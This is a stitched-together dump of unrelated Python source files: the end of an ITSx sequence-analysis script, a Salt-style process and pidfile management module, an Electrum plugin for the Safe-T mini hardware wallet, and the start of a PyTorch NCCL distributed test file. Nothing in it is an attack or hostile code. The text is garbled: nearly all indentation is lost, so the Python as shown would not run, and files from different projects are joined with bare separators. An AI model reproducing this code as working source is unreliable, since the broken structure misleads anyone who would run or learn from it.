sample.commands.ITSx = ITSx(o=sample.general.ITSxresults,
i=sample.general.bestassemblyfile,
cpu=self.threads,
N=2, t=self.hmm,
detailed_results="T",
preserve="T")
if not all(map(os.path.isfile, [positions, summary])):
sample.commands.ITSx(name=sample.name, total=int(sample.assembly.TotalLength))
if all(map(os.path.isfile, [positions, summary])):
if os.stat(positions).st_size:
with open(positions) as pos:
self.parse(sample, pos)
else:
printtime("ERROR: No output generated for " + sample.name, self.start)
self.smallqueue.task_done()
if __name__ == '__main__':
from metadataReader import MetadataReader
# from multiprocessing import cpu_count
from time import time
import json
metadata = MetadataObject()
metadata.path = "/data/"
metadata.samples = [GenObject({'name': '2015-SEQ-1283'})]
# metadata.cpus = cpu_count()
metadata.cpus = 4
metadata.hmm = "F,O"
metadata.starttime = time()
metadata.runmetadata.samples = MetadataReader(metadata).samples
ITS(metadata)
# metadata.runmetadata.samples[0].commands.Blast = NcbiblastnCommandline(help=True)
# print json.dumps(dict(metadata.runmetadata.samples[0]), indent=4, sort_keys=True)
|
process.py
|
# -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import, with_statement
import os
import sys
import time
import types
import signal
import logging
import threading
import contextlib
import subprocess
import multiprocessing
import multiprocessing.util
# Import salt libs
import salt.defaults.exitcodes
import salt.utils
import salt.log.setup
from salt.log.mixins import NewStyleClassMixIn
# Import 3rd-party libs
import salt.ext.six as six
from salt.ext.six.moves import queue, range # pylint: disable=import-error,redefined-builtin
log = logging.getLogger(__name__)
# pylint: disable=import-error
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
def systemd_notify_call(action):
process = subprocess.Popen(['systemd-notify', action], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.communicate()
status = process.poll()
return status == 0
def notify_systemd():
'''
Notify systemd that this process has started
'''
try:
import systemd.daemon
except ImportError:
if salt.utils.which('systemd-notify') and systemd_notify_call('--booted'):
return systemd_notify_call('--ready')
return False
if systemd.daemon.booted():
try:
return systemd.daemon.notify('READY=1')
except SystemError:
# Daemon was not started by systemd
pass
def set_pidfile(pidfile, user):
'''
Save the pidfile
'''
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.fopen(pidfile, 'w+') as ofile:
ofile.write(str(os.getpid()))
except IOError:
pass
    log.debug('Created pidfile: {0}'.format(pidfile))
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
#import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
#groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
    except (KeyError, IndexError):
sys.stderr.write(
'Failed to set the pid to user: {0}. The user is not '
'available.\n'.format(
user
)
)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = (
'Failed to set the ownership of PID file {0} to user {1}.'.format(
pidfile, user
)
)
log.debug('{0} Traceback follows:\n'.format(msg), exc_info=True)
sys.stderr.write('{0}\n'.format(msg))
sys.exit(err.errno)
log.debug('Chowned pidfile: {0} to user: {1}'.format(pidfile, user))
def check_pidfile(pidfile):
'''
Determine if a pidfile has been written out
'''
return os.path.isfile(pidfile)
def get_pidfile(pidfile):
'''
Return the pid from a pidfile as an integer
'''
with salt.utils.fopen(pidfile) as pdf:
pid = pdf.read()
return int(pid)
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
'''
Use OS facilities to determine if a process is running
'''
if isinstance(pid, six.string_types):
pid = int(pid)
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ThreadPool(object):
'''
This is a very VERY basic threadpool implementation
This was made instead of using multiprocessing ThreadPool because
we want to set max queue size and we want to daemonize threads (neither
is exposed in the stdlib version).
    Since there isn't much use for this class right now, this implementation
    only supports daemonized threads and will *not* return results.
TODO: if this is found to be more generally useful it would be nice to pull
in the majority of code from upstream or from http://bit.ly/1wTeJtM
'''
def __init__(self,
num_threads=None,
queue_size=0):
# if no count passed, default to number of CPUs
if num_threads is None:
num_threads = multiprocessing.cpu_count()
self.num_threads = num_threads
# create a task queue of queue_size
self._job_queue = queue.Queue(queue_size)
self._workers = []
# create worker threads
for _ in range(num_threads):
thread = threading.Thread(target=self._thread_target)
thread.daemon = True
thread.start()
self._workers.append(thread)
# intentionally not called "apply_async" since we aren't keeping track of
# the return at all, if we want to make this API compatible with multiprocessing
# threadpool we can in the future, and we won't have to worry about name collision
def fire_async(self, func, args=None, kwargs=None):
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
self._job_queue.put_nowait((func, args, kwargs))
return True
except queue.Full:
return False
def _thread_target(self):
while True:
# 1s timeout so that if the parent dies this thread will die within 1s
try:
try:
func, args, kwargs = self._job_queue.get(timeout=1)
self._job_queue.task_done() # Mark the task as done once we get it
except queue.Empty:
continue
except AttributeError:
                # During shutdown, `queue` may not have an `Empty` attribute. Thusly,
# we have to catch a possible exception from our exception handler in
# order to avoid an unclean shutdown. Le sigh.
continue
try:
log.debug('ThreadPool executing func: {0} with args:{1}'
' kwargs{2}'.format(func, args, kwargs))
func(*args, **kwargs)
except Exception as err:
log.debug(err, exc_info=True)
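# Hedged usage sketch (illustrative only, not part of the original module):
# jobs are fire-and-forget, and fire_async() returns False once the bounded
# queue is full.
#
#     pool = ThreadPool(num_threads=4, queue_size=10)
#     accepted = pool.fire_async(log.info, args=['hello from the pool'])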
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
self._restart_processes = True
def add_process(self, tgt, args=None, kwargs=None, name=None):
'''
        Create a process to run tgt with args + kwargs.
        This will determine if tgt is a Process class, otherwise it assumes
        it is a function.
'''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if salt.utils.is_windows():
            # Need to ensure that 'log_queue' is correctly transferred to
# processes that inherit from 'MultiprocessingProcess'.
if type(MultiprocessingProcess) is type(tgt) and (
issubclass(tgt, MultiprocessingProcess)):
need_log_queue = True
else:
need_log_queue = False
if need_log_queue and 'log_queue' not in kwargs:
if hasattr(self, 'log_queue'):
kwargs['log_queue'] = self.log_queue
else:
kwargs['log_queue'] = (
salt.log.setup.get_multiprocessing_logging_queue())
if type(multiprocessing.Process) is type(tgt) and issubclass(tgt, multiprocessing.Process):
process = tgt(*args, **kwargs)
else:
process = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs)
if isinstance(process, SignalHandlingMultiprocessingProcess):
with default_signals(signal.SIGINT, signal.SIGTERM):
process.start()
else:
process.start()
# create a nicer name for the debug log
if name is None:
if isinstance(tgt, types.FunctionType):
name = '{0}.{1}'.format(
tgt.__module__,
tgt.__name__,
)
else:
name = '{0}{1}.{2}'.format(
tgt.__module__,
'.{0}'.format(tgt.__class__) if str(tgt.__class__) != "<type 'type'>" else '',
tgt.__name__,
)
log.debug("Started '{0}' with pid {1}".format(name, process.pid))
self._process_map[process.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': process}
return process
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
log.info('Process {0} ({1}) died with exit status {2},'
' restarting...'.format(self._process_map[pid]['tgt'],
pid,
self._process_map[pid]['Process'].exitcode))
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def stop_restarting(self):
self._restart_processes = False
def send_signal_to_processes(self, signal):
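        # Note: the ``signal`` argument shadows the ``signal`` module here,
        # which is harmless because only its numeric value is used below.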
for pid in self._process_map:
os.kill(pid, signal)
def run(self):
'''
Load and start all available api modules
'''
salt.utils.appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
            # There are no SIGTERM handlers installed, install ours
signal.signal(signal.SIGTERM, self.kill_children)
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
            # There are no SIGINT handlers installed, install ours
signal.signal(signal.SIGINT, self.kill_children)
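        # Reap dead children with os.wait() (POSIX) and restart them; Windows
        # has no os.wait(), so fall back to polling check_children() on a timer.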
while True:
try:
# in case someone died while we were waiting...
self.check_children()
if not salt.utils.is_windows():
pid, exit_status = os.wait()
if pid not in self._process_map:
log.debug('Process of pid {0} died, not a known'
' process, will not restart'.format(pid))
continue
self.restart_process(pid)
else:
# os.wait() is not supported on Windows.
time.sleep(10)
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
def check_children(self):
'''
Check the children once
'''
if self._restart_processes is True:
for pid, mapping in six.iteritems(self._process_map):
if not mapping['Process'].is_alive():
self.restart_process(pid)
def kill_children(self, *args):
'''
Kill all of the children
'''
# check that this is the correct process, children inherit this
# handler, if we are in a child lets just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
if salt.utils.is_windows():
with open(os.devnull, 'wb') as devnull:
for pid, p_map in six.iteritems(self._process_map):
# On Windows, we need to explicitly terminate sub-processes
# because the processes don't have a sigterm handler.
subprocess.call(
['taskkill', '/F', '/T', '/PID', str(pid)],
stdout=devnull, stderr=devnull
)
p_map['Process'].terminate()
else:
for pid, p_map in six.iteritems(self._process_map.copy()):
if args:
# escalate the signal to the process
os.kill(pid, args[0])
try:
p_map['Process'].terminate()
except OSError as exc:
if exc.errno != 3:
raise
del self._process_map[pid]
end_time = time.time() + self.wait_for_kill # when to die
while self._process_map and time.time() < end_time:
for pid, p_map in six.iteritems(self._process_map.copy()):
p_map['Process'].join(0)
# This is a race condition if a signal was passed to all children
try:
del self._process_map[pid]
except KeyError:
pass
        # SIGKILL any children that are still alive after the wait period
for pid in self._process_map:
try:
                os.kill(pid, signal.SIGKILL)
            # os.kill raises OSError if the process has already exited
except OSError:
pass
class MultiprocessingProcess(multiprocessing.Process, NewStyleClassMixIn):
def __init__(self, *args, **kwargs):
self.log_queue = kwargs.pop('log_queue', None)
if self.log_queue is None:
self.log_queue = salt.log.setup.get_multiprocessing_logging_queue()
multiprocessing.util.register_after_fork(self, MultiprocessingProcess.__setup_process_logging)
multiprocessing.util.Finalize(self, salt.log.setup.shutdown_multiprocessing_logging, exitpriority=16)
super(MultiprocessingProcess, self).__init__(*args, **kwargs)
def __setup_process_logging(self):
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
class SignalHandlingMultiprocessingProcess(MultiprocessingProcess):
def __init__(self, *args, **kwargs):
multiprocessing.util.register_after_fork(self, SignalHandlingMultiprocessingProcess.__setup_signals)
super(SignalHandlingMultiprocessingProcess, self).__init__(*args, **kwargs)
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
msg = '{0} received a '.format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += 'SIGINT'
elif signum == signal.SIGTERM:
msg += 'SIGTERM'
msg += '. Exiting'
log.debug(msg)
exit(0)
def start(self):
with default_signals(signal.SIGINT, signal.SIGTERM):
super(SignalHandlingMultiprocessingProcess, self).start()
@contextlib.contextmanager
def default_signals(*signals):
old_signals = {}
for signum in signals:
old_signals[signum] = signal.getsignal(signum)
signal.signal(signum, signal.SIG_DFL)
# Do whatever is needed with the reset signals
yield
# Restore signals
for signum in old_signals:
signal.signal(signum, old_signals[signum])
del old_signals
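# Hedged usage sketch (illustrative, not part of the original module): restore
# the default handlers while starting a child so it does not inherit custom
# SIGINT/SIGTERM handlers; this mirrors how add_process() starts
# SignalHandlingMultiprocessingProcess instances above.
#
#     with default_signals(signal.SIGINT, signal.SIGTERM):
#         child = multiprocessing.Process(target=some_target)  # `some_target` is illustrative
#         child.start()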
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bip32 import BIP32Node
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device
from electrum.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum.keystore import Hardware_KeyStore
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
from .client import SafeTClient
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
plugin: 'SafeTPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True) -> Optional['SafeTClient']:
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(repr(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
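        # Convert an xpub plus a relative derivation suffix into the protobuf
        # HDNodeType/HDNodePathType structures defined in safetlib.messages.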
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx: PartialTransaction, prev_tx):
self.prev_tx = prev_tx
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, for_sig=True, keystore=keystore)
outputs = self.tx_outputs(tx, keystore=keystore)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.get_derivation_prefix()
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
address_n = client.expand_path(address_path)
script_type = self.get_safet_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for pubkey, xpub in sorted_pairs])
else:
multisig = None
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx: Transaction, *, for_sig=False, keystore: 'SafeTKeyStore' = None):
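        # Build one TxInputType message per input; when signing (for_sig=True)
        # also attach the script type, any multisig redeem-script info and the
        # keystore's own derivation path so the device can derive the key.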
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin.is_coinbase_input():
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
assert isinstance(tx, PartialTransaction)
assert isinstance(txin, PartialTxInput)
assert keystore
if len(txin.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txin)
multisig = self._make_multisig(txin.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
script_type = self.get_safet_input_script_type(txin.script_type)
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig)
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txin)
if full_path:
txinputtype._extend_address_n(full_path)
prev_hash = txin.prevout.txid
prev_index = txin.prevout.out_idx
if txin.value_sats() is not None:
txinputtype.amount = txin.value_sats()
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.script_sig is not None:
txinputtype.script_sig = txin.script_sig
txinputtype.sequence = txin.nsequence
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
return self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
def tx_outputs(self, tx: PartialTransaction, *, keystore: 'SafeTKeyStore'):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(txout.script_type)
if len(txout.pubkeys) > 1:
xpubs_and_deriv_suffixes = get_xpubs_and_der_suffixes_from_txinout(tx, txout)
multisig = self._make_multisig(txout.num_sig, xpubs_and_deriv_suffixes)
else:
multisig = None
my_pubkey, full_path = keystore.find_my_pubkey_in_txinout(txout)
assert full_path
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=txout.value,
address_n=full_path,
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = txout.value
if address:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
else:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(txout)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for txout in tx.outputs():
address = txout.address
use_create_by_derivation = False
if txout.is_mine and not has_change:
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if txout.is_change == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx: Optional[Transaction]):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
tx.deserialize()
t.version = tx.version
t.lock_time = tx.locktime
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for out in tx.outputs():
o = t._add_bin_outputs()
o.amount = out.value
o.script_pubkey = out.scriptpubkey
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
test_c10d_nccl.py
|
import copy
import math
import os
import random
import signal
import sys
import tempfile
import threading
import time
from contextlib import contextmanager
from datetime import timedelta
from itertools import product
from unittest import mock
import torch
import torch.distributed as c10d
if not c10d.is_available():
print("c10d not available, skipping tests", file=sys.stderr)
sys.exit(0)
import test_c10d_common
import torch.distributed as dist
import torch.distributed.algorithms.ddp_comm_hooks.default_hooks as default
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from test_c10d_common import gpus_for_rank, DoubleGpuNet, ConvNet, ModuleForDdpCommHook
from torch import nn
from torch.nn.parallel import DistributedDataParallel
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
requires_nccl,
requires_nccl_version,
skip_if_lt_x_gpu,
get_timeout,
skip_if_rocm,
with_dist_debug_levels,
with_nccl_blocking_wait,
)
from torch.testing._internal.common_utils import (
IS_WINDOWS,
TestCase,
run_tests,
retry_on_connect_failures,
TEST_WITH_ASAN,
TEST_WITH_TSAN,
sandcastle_skip,
sandcastle_skip_if,
)
from torch.utils.checkpoint import checkpoint
if not IS_WINDOWS:
from torch.distributed.optim.functional_sgd import _FunctionalSGD
from torch.distributed.optim.functional_adam import _FunctionalAdam
_SUPPORTED_OPTIM_MAPPING = {
_FunctionalSGD: torch.optim.SGD,
_FunctionalAdam: torch.optim.Adam
}
if TEST_WITH_TSAN:
print(
"Skip as TSAN is not fork-safe since we're forking in a multi-threaded environment",
file=sys.stderr,
)
sys.exit(0)
if TEST_WITH_ASAN:
print(
"Skip ASAN as torch + multiprocessing spawn have known issues", file=sys.stderr
)
sys.exit(0)
class RendezvousEnvTest(TestCase):
@retry_on_connect_failures
@requires_nccl()
@sandcastle_skip_if(
torch.cuda.device_count() == 0, "No GPUs available, skipping test"
)
def test_common_errors(self):
vars = {
"WORLD_SIZE": "1",
"RANK": "0",
"MASTER_ADDR": "127.0.0.1",
"MASTER_PORT": str(common.find_free_port()),
}
class Env(object):
def __init__(self, vars):
self.env_patcher = mock.patch.dict(os.environ, vars, clear=True)
def __enter__(self):
self.env_patcher.start()
def __exit__(self, type, value, traceback):
self.env_patcher.stop()
def without(d, key):
d = d.copy()
d.pop(key)
return d
def withouts(d, keys):
d = d.copy()
for key in keys:
d.pop(key)
return d
with Env(without(vars, "WORLD_SIZE")):
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
with self.assertRaisesRegex(ValueError, "WORLD_SIZE expected"):
gen = c10d.rendezvous("env://")
next(gen)
c10d.init_process_group(backend="nccl", world_size=1)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(without(vars, "RANK")):
self.assertEqual(None, os.environ.get("RANK"))
with self.assertRaisesRegex(ValueError, "RANK expected"):
gen = c10d.rendezvous("env://")
next(gen)
c10d.init_process_group(backend="nccl", rank=0)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
self.assertEqual(None, os.environ.get("RANK"))
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
c10d.init_process_group(backend="nccl", rank=0, world_size=1)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(vars):
c10d.init_process_group(backend="nccl")
self.assertEqual(c10d.get_rank(), 0)
